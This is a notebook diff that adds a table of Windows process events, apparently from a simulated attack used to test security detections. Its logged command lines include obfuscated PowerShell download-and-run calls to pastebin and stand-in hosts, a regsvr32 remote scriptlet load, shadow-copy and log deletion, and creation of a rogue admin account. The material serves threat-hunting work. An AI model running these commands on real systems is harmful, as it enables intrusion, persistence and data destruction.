+       "      <td>C:\\Diagnostics\\UserTmp\\reg.exe</td>\n",
+       "      <td>.\\reg  not /domain:everything that /sid:shines is /krbtgt:golden !</td>\n",
+       "      <td>1</td>\n",
+       "      <td>16</td>\n",
+       "      <td>2951</td>\n",
+       "      <td>False</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>356</th>\n",
+       "      <td>2019-01-15 04:23:43.103</td>\n",
+       "      <td>2019-01-15 05:15:20.623</td>\n",
+       "      <td>C:\\Program Files\\Microsoft Monitoring Agent\\Agent\\Health Service State\\Resources\\222\\pmfexe.exe</td>\n",
+       "      <td>\"C:\\Program Files\\Microsoft Monitoring Agent\\Agent\\Health Service State\\Resources\\222\\pmfexe.exe...</td>\n",
+       "      <td>1</td>\n",
+       "      <td>27</td>\n",
+       "      <td>9108</td>\n",
+       "      <td>True</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>301</th>\n",
+       "      <td>2019-01-15 04:23:43.103</td>\n",
+       "      <td>2019-01-15 05:15:20.623</td>\n",
+       "      <td>C:\\Windows\\System32\\cmd.exe</td>\n",
+       "      <td>\"cmd\"</td>\n",
+       "      <td>1</td>\n",
+       "      <td>2</td>\n",
+       "      <td>2570</td>\n",
+       "      <td>True</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>256</th>\n",
+       "      <td>2019-01-15 04:23:43.103</td>\n",
+       "      <td>2019-01-15 05:15:20.623</td>\n",
+       "      <td>C:\\WindowsAzure\\GuestAgent_2.7.41491.901_2019-01-14_202614\\CollectGuestLogs.exe</td>\n",
+       "      <td>\"CollectGuestLogs.exe\" -Mode:ga -FileName:C:\\WindowsAzure\\CollectGuestLogsTemp\\710dc858-9c96-4df...</td>\n",
+       "      <td>1</td>\n",
+       "      <td>18</td>\n",
+       "      <td>6421</td>\n",
+       "      <td>True</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>219</th>\n",
+       "      <td>2019-01-15 04:23:43.103</td>\n",
+       "      <td>2019-01-15 05:15:20.623</td>\n",
+       "      <td>C:\\Windows\\System32\\wermgr.exe</td>\n",
+       "      <td>C:\\Windows\\system32\\wermgr.exe -upload</td>\n",
+       "      <td>1</td>\n",
+       "      <td>7</td>\n",
+       "      <td>2922</td>\n",
+       "      <td>True</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>198</th>\n",
+       "      <td>2019-01-15 04:23:43.103</td>\n",
+       "      <td>2019-01-15 05:15:20.623</td>\n",
+       "      <td>C:\\Diagnostics\\UserTmp\\cmd.exe</td>\n",
+       "      <td>cmd  /c echo \" SYSTEMINFO &amp;&amp; SYSTEMINFO &amp;&amp; DEL \"</td>\n",
+       "      <td>1</td>\n",
+       "      <td>17</td>\n",
+       "      <td>2941</td>\n",
+       "      <td>False</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>195</th>\n",
+       "      <td>2019-01-15 04:23:43.103</td>\n",
+       "      <td>2019-01-15 05:15:20.623</td>\n",
+       "      <td>C:\\Diagnostics\\UserTmp\\cmd.exe</td>\n",
+       "      <td>cmd  /c \"cd /d \"C:\\inetpub\\wwwroot\"&amp;c:\\windows\\system32\\inetsrv\\appcmd set config \"Default Web S...</td>\n",
+       "      <td>1</td>\n",
+       "      <td>39</td>\n",
+       "      <td>2941</td>\n",
+       "      <td>False</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>176</th>\n",
+       "      <td>2019-01-15 04:23:43.103</td>\n",
+       "      <td>2019-01-15 05:15:20.623</td>\n",
+       "      <td>C:\\Diagnostics\\UserTmp\\wuauclt.exe</td>\n",
+       "      <td>.\\wuauclt.exe  /C \"c:\\windows\\softwaredistribution\\cscript.exe\"</td>\n",
+       "      <td>1</td>\n",
+       "      <td>14</td>\n",
+       "      <td>3406</td>\n",
+       "      <td>False</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>171</th>\n",
+       "      <td>2019-01-15 04:23:43.103</td>\n",
+       "      <td>2019-01-15 05:15:20.623</td>\n",
+       "      <td>C:\\Windows\\System32\\svchost.exe</td>\n",
+       "      <td>c:\\Windows\\System32\\svchost.exe  -k malicious</td>\n",
+       "      <td>1</td>\n",
+       "      <td>9</td>\n",
+       "      <td>3040</td>\n",
+       "      <td>False</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>163</th>\n",
+       "      <td>2019-01-15 04:23:43.103</td>\n",
+       "      <td>2019-01-15 05:15:20.623</td>\n",
+       "      <td>C:\\Diagnostics\\UserTmp\\netsh.exe</td>\n",
+       "      <td>.\\netsh  advfirewall firewall add rule name=RbtGskQ action=allow program=c:\\users\\Bob\\appdata\\Ro...</td>\n",
+       "      <td>1</td>\n",
+       "      <td>18</td>\n",
+       "      <td>3179</td>\n",
+       "      <td>False</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>162</th>\n",
+       "      <td>2019-01-15 04:23:43.103</td>\n",
+       "      <td>2019-01-15 05:15:20.623</td>\n",
+       "      <td>C:\\Diagnostics\\UserTmp\\cmd.exe</td>\n",
+       "      <td>cmd  /c C:\\Windows\\System32\\mshta.exe vbscript:CreateObject(\"Wscript.Shell\").Run(\".\\powershell.e...</td>\n",
+       "      <td>1</td>\n",
+       "      <td>56</td>\n",
+       "      <td>2941</td>\n",
+       "      <td>False</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>139</th>\n",
+       "      <td>2019-01-15 04:23:43.103</td>\n",
+       "      <td>2019-01-15 05:15:20.623</td>\n",
+       "      <td>C:\\Diagnostics\\UserTmp\\powershell.exe</td>\n",
+       "      <td>.\\powershell  -command \"(New-Object Net.WebClient).DownloadString(('ht'+'tp://pasteb' + 'bin/'+'...</td>\n",
+       "      <td>1</td>\n",
+       "      <td>36</td>\n",
+       "      <td>3726</td>\n",
+       "      <td>False</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>134</th>\n",
+       "      <td>2019-01-15 04:23:43.103</td>\n",
+       "      <td>2019-01-15 05:15:20.623</td>\n",
+       "      <td>C:\\Windows\\System32\\wbem\\WmiPrvSE.exe</td>\n",
+       "      <td>C:\\Windows\\system32\\wbem\\wmiprvse.exe -Embedding</td>\n",
+       "      <td>1</td>\n",
+       "      <td>8</td>\n",
+       "      <td>3546</td>\n",
+       "      <td>True</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>133</th>\n",
+       "      <td>2019-01-15 04:23:43.103</td>\n",
+       "      <td>2019-01-15 05:15:20.623</td>\n",
+       "      <td>C:\\Windows\\System32\\sppsvc.exe</td>\n",
+       "      <td>C:\\Windows\\system32\\sppsvc.exe</td>\n",
+       "      <td>1</td>\n",
+       "      <td>5</td>\n",
+       "      <td>2933</td>\n",
+       "      <td>True</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>130</th>\n",
+       "      <td>2019-01-15 04:23:43.103</td>\n",
+       "      <td>2019-01-15 05:15:20.623</td>\n",
+       "      <td>C:\\Diagnostics\\UserTmp\\powershell.exe</td>\n",
+       "      <td>.\\powershell  -Noninteractive -Noprofile -Command \"Invoke-Expression Get-Process; Invoke-WebRequ...</td>\n",
+       "      <td>1</td>\n",
+       "      <td>25</td>\n",
+       "      <td>3726</td>\n",
+       "      <td>False</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>110</th>\n",
+       "      <td>2019-01-15 04:23:43.103</td>\n",
+       "      <td>2019-01-15 05:15:20.623</td>\n",
+       "      <td>C:\\Diagnostics\\UserTmp\\cmd.exe</td>\n",
+       "      <td>cmd  /c \".\\pOWErS^H^ElL^.eX^e^ -^ExEc^Ut^IoNpOliCy BYpa^sS i^mPOr^T-^M^oDuLE biTsTr^ANSFe^R;^S^t...</td>\n",
+       "      <td>1</td>\n",
+       "      <td>46</td>\n",
+       "      <td>2941</td>\n",
+       "      <td>False</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>292</th>\n",
+       "      <td>2019-01-15 04:23:43.103</td>\n",
+       "      <td>2019-01-15 05:15:20.623</td>\n",
+       "      <td>C:\\Windows\\System32\\taskhostw.exe</td>\n",
+       "      <td>taskhostw.exe SYSTEM</td>\n",
+       "      <td>1</td>\n",
+       "      <td>2</td>\n",
+       "      <td>3262</td>\n",
+       "      <td>True</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>106</th>\n",
+       "      <td>2019-01-15 04:23:43.103</td>\n",
+       "      <td>2019-01-15 05:15:20.623</td>\n",
+       "      <td>C:\\Diagnostics\\UserTmp\\powershell.exe</td>\n",
+       "      <td>.\\powershell.exe  -c \"$a = 'Download'+'String'+\"(('ht'+'tp://paste'+ 'bin/'+'raw/'+'pqCwEm17'))\"...</td>\n",
+       "      <td>1</td>\n",
+       "      <td>68</td>\n",
+       "      <td>3726</td>\n",
+       "      <td>False</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>57</th>\n",
+       "      <td>2019-01-15 04:23:43.103</td>\n",
+       "      <td>2019-01-15 05:15:20.623</td>\n",
+       "      <td>C:\\Diagnostics\\UserTmp\\tsetup.1.exe</td>\n",
+       "      <td>c:\\Diagnostics\\UserTmp\\tsetup.1.exe  C:\\Users\\MSTICAdmin\\AppData\\Local\\Temp\\2\\is-01DD7.tmp\\tsetu...</td>\n",
+       "      <td>1</td>\n",
+       "      <td>40</td>\n",
+       "      <td>3405</td>\n",
+       "      <td>False</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>59</th>\n",
+       "      <td>2019-01-15 04:23:43.103</td>\n",
+       "      <td>2019-01-15 05:15:20.623</td>\n",
+       "      <td>C:\\Diagnostics\\UserTmp\\netsh.exe</td>\n",
+       "      <td>.\\netsh.exe  \"in (*.exe) do start # artificial commandline solely for purposes of triggering test\"</td>\n",
+       "      <td>1</td>\n",
+       "      <td>22</td>\n",
+       "      <td>3179</td>\n",
+       "      <td>False</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>61</th>\n",
+       "      <td>2019-01-15 04:23:43.103</td>\n",
+       "      <td>2019-01-15 05:15:20.623</td>\n",
+       "      <td>C:\\Diagnostics\\UserTmp\\cmd.exe</td>\n",
+       "      <td>.\\cmd  /c \"cd /d \"C:\\inetpub\\wwwroot\"&amp;powershell Enable-WSManCredSSP =2013Role Server -force&amp;ech...</td>\n",
+       "      <td>1</td>\n",
+       "      <td>28</td>\n",
+       "      <td>2941</td>\n",
+       "      <td>False</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>64</th>\n",
+       "      <td>2019-01-15 04:23:43.103</td>\n",
+       "      <td>2019-01-15 05:15:20.623</td>\n",
+       "      <td>C:\\Diagnostics\\UserTmp\\cmd.exe</td>\n",
+       "      <td>.\\cmd  /c \"cd /d \"C:\\inetpub\\wwwroot\"&amp;c:\\windows\\system32\\inetsrv\\appcmd set config \"Default Web...</td>\n",
+       "      <td>1</td>\n",
+       "      <td>41</td>\n",
+       "      <td>2941</td>\n",
+       "      <td>False</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>65</th>\n",
+       "      <td>2019-01-15 04:23:43.103</td>\n",
+       "      <td>2019-01-15 05:15:20.623</td>\n",
+       "      <td>C:\\Diagnostics\\UserTmp\\cmd.exe</td>\n",
+       "      <td>.\\cmd  /c \"cd /d \"C:\\inetpub\\wwwroot\"&amp;del C:\\inetpub\\logs\\logFiles\\W3SVC1\\*.log /q&amp;echo [S]&amp;cd&amp;e...</td>\n",
+       "      <td>1</td>\n",
+       "      <td>32</td>\n",
+       "      <td>2941</td>\n",
+       "      <td>False</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>74</th>\n",
+       "      <td>2019-01-15 04:23:43.103</td>\n",
+       "      <td>2019-01-15 05:15:20.623</td>\n",
+       "      <td>C:\\Windows\\System32\\dllhost.exe</td>\n",
+       "      <td>C:\\Windows\\system32\\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E}</td>\n",
+       "      <td>1</td>\n",
+       "      <td>12</td>\n",
+       "      <td>3024</td>\n",
+       "      <td>True</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>62</th>\n",
+       "      <td>2019-01-15 04:23:43.103</td>\n",
+       "      <td>2019-01-15 05:15:20.623</td>\n",
+       "      <td>C:\\Diagnostics\\UserTmp\\cmd.exe</td>\n",
+       "      <td>.\\cmd  /c \"cd /d \"C:\\inetpub\\wwwroot\"&amp;powershell winrm set winrm/config/service/Auth @{Kerberos=...</td>\n",
+       "      <td>1</td>\n",
+       "      <td>31</td>\n",
+       "      <td>2941</td>\n",
+       "      <td>False</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>78</th>\n",
+       "      <td>2019-01-15 04:23:43.103</td>\n",
+       "      <td>2019-01-15 05:15:20.623</td>\n",
+       "      <td>C:\\Windows\\System32\\cmd.exe</td>\n",
+       "      <td>cmd  /c echo timb@microsoft.com; romead@microsoft.com; ianhelle@microsoft.com; marcook@microsoft...</td>\n",
+       "      <td>1</td>\n",
+       "      <td>21</td>\n",
+       "      <td>2570</td>\n",
+       "      <td>False</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>82</th>\n",
+       "      <td>2019-01-15 04:23:43.103</td>\n",
+       "      <td>2019-01-15 05:15:20.623</td>\n",
+       "      <td>C:\\Windows\\System32\\net1.exe</td>\n",
+       "      <td>C:\\Windows\\system32\\net1  share TestShare=c:\\testshare /Grant:Users,Read</td>\n",
+       "      <td>1</td>\n",
+       "      <td>13</td>\n",
+       "      <td>2638</td>\n",
+       "      <td>False</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>83</th>\n",
+       "      <td>2019-01-15 04:23:43.103</td>\n",
+       "      <td>2019-01-15 05:15:20.623</td>\n",
+       "      <td>C:\\Windows\\System32\\Dism.exe</td>\n",
+       "      <td>dism /online /enable-feature /featurename:File-Services /NoRestart</td>\n",
+       "      <td>1</td>\n",
+       "      <td>11</td>\n",
+       "      <td>2659</td>\n",
+       "      <td>True</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>86</th>\n",
+       "      <td>2019-01-15 04:23:43.103</td>\n",
+       "      <td>2019-01-15 05:15:20.623</td>\n",
+       "      <td>C:\\Windows\\Temp\\CC563BBE-DE32-44D3-8E35-F3FC78E72E40\\DismHost.exe</td>\n",
+       "      <td>C:\\Windows\\TEMP\\CC563BBE-DE32-44D3-8E35-F3FC78E72E40\\dismhost.exe {D57BA872-53C0-424D-80AE-E4911...</td>\n",
+       "      <td>1</td>\n",
+       "      <td>15</td>\n",
+       "      <td>4900</td>\n",
+       "      <td>True</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>87</th>\n",
+       "      <td>2019-01-15 04:23:43.103</td>\n",
+       "      <td>2019-01-15 05:15:20.623</td>\n",
+       "      <td>C:\\Windows\\servicing\\TrustedInstaller.exe</td>\n",
+       "      <td>C:\\Windows\\servicing\\TrustedInstaller.exe</td>\n",
+       "      <td>1</td>\n",
+       "      <td>5</td>\n",
+       "      <td>4175</td>\n",
+       "      <td>True</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>94</th>\n",
+       "      <td>2019-01-15 04:23:43.103</td>\n",
+       "      <td>2019-01-15 05:15:20.623</td>\n",
+       "      <td>C:\\Diagnostics\\UserTmp\\regsvr32.exe</td>\n",
+       "      <td>.\\regsvr32   /s /n /u /i:http://server/file.sct scrobj.dll</td>\n",
+       "      <td>1</td>\n",
+       "      <td>20</td>\n",
+       "      <td>3399</td>\n",
+       "      <td>False</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>75</th>\n",
+       "      <td>2019-01-15 04:23:43.103</td>\n",
+       "      <td>2019-01-15 05:15:20.623</td>\n",
+       "      <td>C:\\Windows\\System32\\cmd.exe</td>\n",
+       "      <td>cmd.exe /c c:\\Diagnostics\\WindowsSimulateDetections.bat c:\\Diagnostics\\UserTmp</td>\n",
+       "      <td>1</td>\n",
+       "      <td>12</td>\n",
+       "      <td>2570</td>\n",
+       "      <td>True</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>108</th>\n",
+       "      <td>2019-01-15 04:23:43.103</td>\n",
+       "      <td>2019-01-15 05:15:20.623</td>\n",
+       "      <td>C:\\Diagnostics\\UserTmp\\powershell.exe</td>\n",
+       "      <td>.\\powershell  -c {IEX (New-Object Net.WebClient).DownloadString(('ht'+(\"{2}{0}{1}\"-f ':/','/past...</td>\n",
+       "      <td>1</td>\n",
+       "      <td>53</td>\n",
+       "      <td>3726</td>\n",
+       "      <td>False</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>63</th>\n",
+       "      <td>2019-01-15 05:15:16.850</td>\n",
+       "      <td>2019-01-15 05:15:17.580</td>\n",
+       "      <td>C:\\Diagnostics\\UserTmp\\cmd.exe</td>\n",
+       "      <td>.\\cmd  /c \"cd /d \"C:\\ProgramData\"&amp;copy \\\\[REDACTED]\\c$\\users\\[REDACTED]\\Documents\\\"Password Chan...</td>\n",
+       "      <td>2</td>\n",
+       "      <td>29</td>\n",
+       "      <td>2941</td>\n",
+       "      <td>False</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>211</th>\n",
+       "      <td>2019-01-15 05:15:19.223</td>\n",
+       "      <td>2019-01-15 05:15:19.337</td>\n",
+       "      <td>C:\\Diagnostics\\UserTmp\\hd.exe</td>\n",
+       "      <td>hd.exe  -pslist</td>\n",
+       "      <td>2</td>\n",
+       "      <td>4</td>\n",
+       "      <td>2837</td>\n",
+       "      <td>False</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>190</th>\n",
+       "      <td>2019-01-15 05:15:18.287</td>\n",
+       "      <td>2019-01-15 05:15:18.967</td>\n",
+       "      <td>C:\\Diagnostics\\UserTmp\\lsass.exe</td>\n",
+       "      <td>.\\lsass.exe  /C \"c:\\windows\\softwaredistribution\\cscript.exe\"</td>\n",
+       "      <td>2</td>\n",
+       "      <td>14</td>\n",
+       "      <td>3183</td>\n",
+       "      <td>False</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>149</th>\n",
+       "      <td>2019-01-15 05:15:15.520</td>\n",
+       "      <td>2019-01-15 05:15:15.923</td>\n",
+       "      <td>C:\\Windows\\System32\\net.exe</td>\n",
+       "      <td>net  group \"Domain Admins\" /domain</td>\n",
+       "      <td>2</td>\n",
+       "      <td>8</td>\n",
+       "      <td>2589</td>\n",
+       "      <td>False</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>104</th>\n",
+       "      <td>2019-01-15 05:15:12.977</td>\n",
+       "      <td>2019-01-15 05:15:19.583</td>\n",
+       "      <td>C:\\Diagnostics\\UserTmp\\powershell.exe</td>\n",
+       "      <td>.\\powershell  -command {(n`EW-obJ`E`cT N`et`.W`eb`C`li`en`t).DownloadFile('https://blah/png','go...</td>\n",
+       "      <td>2</td>\n",
+       "      <td>24</td>\n",
+       "      <td>3726</td>\n",
+       "      <td>False</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>95</th>\n",
+       "      <td>2019-01-15 05:15:10.817</td>\n",
+       "      <td>2019-01-15 05:15:14.453</td>\n",
+       "      <td>C:\\Windows\\System32\\svchost.exe</td>\n",
+       "      <td>C:\\Windows\\system32\\svchost.exe -k wsappx</td>\n",
+       "      <td>2</td>\n",
+       "      <td>8</td>\n",
+       "      <td>3040</td>\n",
+       "      <td>True</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>77</th>\n",
+       "      <td>2019-01-15 05:15:03.247</td>\n",
+       "      <td>2019-01-15 05:15:11.260</td>\n",
+       "      <td>C:\\Windows\\System32\\cmd.exe</td>\n",
+       "      <td>cmd  /c echo Any questions about the commands executed here then please contact one of</td>\n",
+       "      <td>2</td>\n",
+       "      <td>16</td>\n",
+       "      <td>2570</td>\n",
+       "      <td>False</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>270</th>\n",
+       "      <td>2019-01-15 04:28:01.517</td>\n",
+       "      <td>2019-01-15 04:28:33.090</td>\n",
+       "      <td>C:\\Program Files (x86)\\Google\\Update\\GoogleUpdate.exe</td>\n",
+       "      <td>\"C:\\Program Files (x86)\\Google\\Update\\GoogleUpdate.exe\" /ua /installsource scheduler</td>\n",
+       "      <td>2</td>\n",
+       "      <td>17</td>\n",
+       "      <td>4895</td>\n",
+       "      <td>True</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>254</th>\n",
+       "      <td>2019-01-15 04:42:25.437</td>\n",
+       "      <td>2019-01-15 05:12:25.403</td>\n",
+       "      <td>C:\\Windows\\System32\\MusNotification.exe</td>\n",
+       "      <td>C:\\Windows\\system32\\MusNotification.exe Display</td>\n",
+       "      <td>2</td>\n",
+       "      <td>6</td>\n",
+       "      <td>3826</td>\n",
+       "      <td>True</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>60</th>\n",
+       "      <td>2019-01-15 05:15:15.827</td>\n",
+       "      <td>2019-01-15 05:15:16.720</td>\n",
+       "      <td>C:\\Diagnostics\\UserTmp\\cmd.exe</td>\n",
+       "      <td>.\\cmd  /c \"cd /d \"C:\\inetpub\\wwwroot\"&amp;powershell Set-ExecutionPolicy RemoteSigned&amp;echo [S]&amp;cd&amp;ec...</td>\n",
+       "      <td>3</td>\n",
+       "      <td>25</td>\n",
+       "      <td>2941</td>\n",
+       "      <td>False</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>142</th>\n",
+       "      <td>2019-01-15 05:15:14.770</td>\n",
+       "      <td>2019-01-15 05:15:15.283</td>\n",
+       "      <td>C:\\Windows\\System32\\whoami.exe</td>\n",
+       "      <td>whoami</td>\n",
+       "      <td>3</td>\n",
+       "      <td>0</td>\n",
+       "      <td>2907</td>\n",
+       "      <td>False</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>125</th>\n",
+       "      <td>2019-01-15 05:15:12.123</td>\n",
+       "      <td>2019-01-15 05:15:17.650</td>\n",
+       "      <td>C:\\Diagnostics\\UserTmp\\cmd.exe</td>\n",
+       "      <td>cmd  /c \"echo Invoke-Expression Get-Process; Invoke-WebRequest -Uri http://badguyserver/pwnme\"</td>\n",
+       "      <td>3</td>\n",
+       "      <td>21</td>\n",
+       "      <td>2941</td>\n",
+       "      <td>False</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>56</th>\n",
+       "      <td>2019-01-15 05:15:16.117</td>\n",
+       "      <td>2019-01-15 05:15:18.403</td>\n",
+       "      <td>C:\\Diagnostics\\UserTmp\\reg.exe</td>\n",
+       "      <td>.\\reg.exe  add \\hkcu\\software\\microsoft\\some\\key\\Run /v abadvalue</td>\n",
+       "      <td>3</td>\n",
+       "      <td>15</td>\n",
+       "      <td>2951</td>\n",
+       "      <td>False</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>85</th>\n",
+       "      <td>2019-01-15 05:15:03.830</td>\n",
+       "      <td>2019-01-15 05:15:19.447</td>\n",
+       "      <td>C:\\Windows\\System32\\net.exe</td>\n",
+       "      <td>net  use q: \\\\MSTICAlertsWin1\\TestShare Bob_testing /User:adm1nistrator</td>\n",
+       "      <td>3</td>\n",
+       "      <td>12</td>\n",
+       "      <td>2589</td>\n",
+       "      <td>False</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>49</th>\n",
+       "      <td>2019-01-15 05:15:16.353</td>\n",
+       "      <td>2019-01-15 05:15:16.520</td>\n",
+       "      <td>C:\\Diagnostics\\UserTmp\\42424.exe</td>\n",
+       "      <td>42424.exe</td>\n",
+       "      <td>3</td>\n",
+       "      <td>1</td>\n",
+       "      <td>2889</td>\n",
+       "      <td>False</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>69</th>\n",
+       "      <td>2019-01-15 05:15:03.390</td>\n",
+       "      <td>2019-01-15 05:15:17.137</td>\n",
+       "      <td>C:\\Windows\\System32\\vssadmin.exe</td>\n",
+       "      <td>vssadmin  delete shadows /all /quiet</td>\n",
+       "      <td>4</td>\n",
+       "      <td>7</td>\n",
+       "      <td>3131</td>\n",
+       "      <td>False</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>193</th>\n",
+       "      <td>2019-01-15 05:02:28.260</td>\n",
+       "      <td>2019-01-15 05:15:19.537</td>\n",
+       "      <td>C:\\Diagnostics\\UserTmp\\cmd.exe</td>\n",
+       "      <td>cmd  /c \"powershell wscript.shell used to download a .gif\"</td>\n",
+       "      <td>5</td>\n",
+       "      <td>14</td>\n",
+       "      <td>2941</td>\n",
+       "      <td>False</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>169</th>\n",
+       "      <td>2019-01-15 05:15:14.493</td>\n",
+       "      <td>2019-01-15 05:15:19.060</td>\n",
+       "      <td>C:\\Diagnostics\\UserTmp\\svchost.exe</td>\n",
+       "      <td>c:\\Diagnostics\\UserTmp\\svchost.exe</td>\n",
+       "      <td>6</td>\n",
+       "      <td>6</td>\n",
+       "      <td>3411</td>\n",
+       "      <td>False</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>122</th>\n",
+       "      <td>2019-01-15 05:15:11.947</td>\n",
+       "      <td>2019-01-15 05:15:19.403</td>\n",
+       "      <td>C:\\Diagnostics\\UserTmp\\implant.exe</td>\n",
+       "      <td>implant.exe  k111</td>\n",
+       "      <td>7</td>\n",
+       "      <td>3</td>\n",
+       "      <td>3390</td>\n",
+       "      <td>False</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>68</th>\n",
+       "      <td>2019-01-15 05:15:12.513</td>\n",
+       "      <td>2019-01-15 05:15:18.630</td>\n",
+       "      <td>C:\\Diagnostics\\UserTmp\\doubleextension.pdf.exe</td>\n",
+       "      <td>c:\\Diagnostics\\UserTmp\\doubleextension.pdf.exe</td>\n",
+       "      <td>7</td>\n",
+       "      <td>7</td>\n",
+       "      <td>4617</td>\n",
+       "      <td>False</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>80</th>\n",
+       "      <td>2019-01-15 05:15:03.410</td>\n",
+       "      <td>2019-01-15 05:15:18.670</td>\n",
+       "      <td>C:\\Windows\\System32\\net1.exe</td>\n",
+       "      <td>C:\\Windows\\system32\\net1  user adm1nistrator Bob_testing /add</td>\n",
+       "      <td>7</td>\n",
+       "      <td>10</td>\n",
+       "      <td>2638</td>\n",
+       "      <td>False</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>67</th>\n",
+       "      <td>2019-01-15 05:15:05.193</td>\n",
+       "      <td>2019-01-15 05:15:19.617</td>\n",
+       "      <td>C:\\Diagnostics\\UserTmp\\sdopfjiowtbkjfnbeioruj.exe</td>\n",
+       "      <td>c:\\Diagnostics\\UserTmp\\sdopfjiowtbkjfnbeioruj.exe</td>\n",
+       "      <td>9</td>\n",
+       "      <td>6</td>\n",
+       "      <td>5005</td>\n",
+       "      <td>False</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>48</th>\n",
+       "      <td>2019-01-15 05:15:10.667</td>\n",
+       "      <td>2019-01-15 05:15:18.917</td>\n",
+       "      <td>C:\\Diagnostics\\UserTmp\\rundll32.exe</td>\n",
+       "      <td>.\\rundll32  /C 42424.exe</td>\n",
+       "      <td>15</td>\n",
+       "      <td>7</td>\n",
+       "      <td>3391</td>\n",
+       "      <td>False</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>47</th>\n",
+       "      <td>2019-01-15 05:15:03.057</td>\n",
+       "      <td>2019-01-15 05:15:18.820</td>\n",
+       "      <td>C:\\Diagnostics\\UserTmp\\cmd.exe</td>\n",
+       "      <td>cmd  /c \"systeminfo &amp;&amp; systeminfo\"</td>\n",
+       "      <td>23</td>\n",
+       "      <td>10</td>\n",
+       "      <td>2941</td>\n",
+       "      <td>False</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>96</th>\n",
+       "      <td>2019-01-15 05:15:11.190</td>\n",
+       "      <td>2019-01-15 05:15:18.867</td>\n",
+       "      <td>C:\\Windows\\System32\\win32calc.exe</td>\n",
+       "      <td>\"C:\\Windows\\System32\\win32calc.exe\"</td>\n",
+       "      <td>28</td>\n",
+       "      <td>8</td>\n",
+       "      <td>3100</td>\n",
+       "      <td>False</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>0</th>\n",
+       "      <td>2019-01-15 04:16:24.007</td>\n",
+       "      <td>2019-01-15 05:24:24.010</td>\n",
+       "      <td>C:\\Program Files\\Microsoft Monitoring Agent\\Agent\\Health Service State\\CT_602681692\\NativeDSC\\De...</td>\n",
+       "      <td>\"C:\\Program Files\\Microsoft Monitoring Agent\\Agent\\Health Service State\\CT_602681692\\NativeDSC\\D...</td>\n",
+       "      <td>35</td>\n",
+       "      <td>52</td>\n",
+       "      <td>12225</td>\n",
+       "      <td>True</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>2</th>\n",
+       "      <td>2019-01-15 04:16:25.550</td>\n",
+       "      <td>2019-01-15 05:24:25.807</td>\n",
+       "      <td>C:\\Windows\\SysWOW64\\wbem\\WmiPrvSE.exe</td>\n",
+       "      <td>C:\\Windows\\sysWOW64\\wbem\\wmiprvse.exe -secured -Embedding</td>\n",
+       "      <td>38</td>\n",
+       "      <td>10</td>\n",
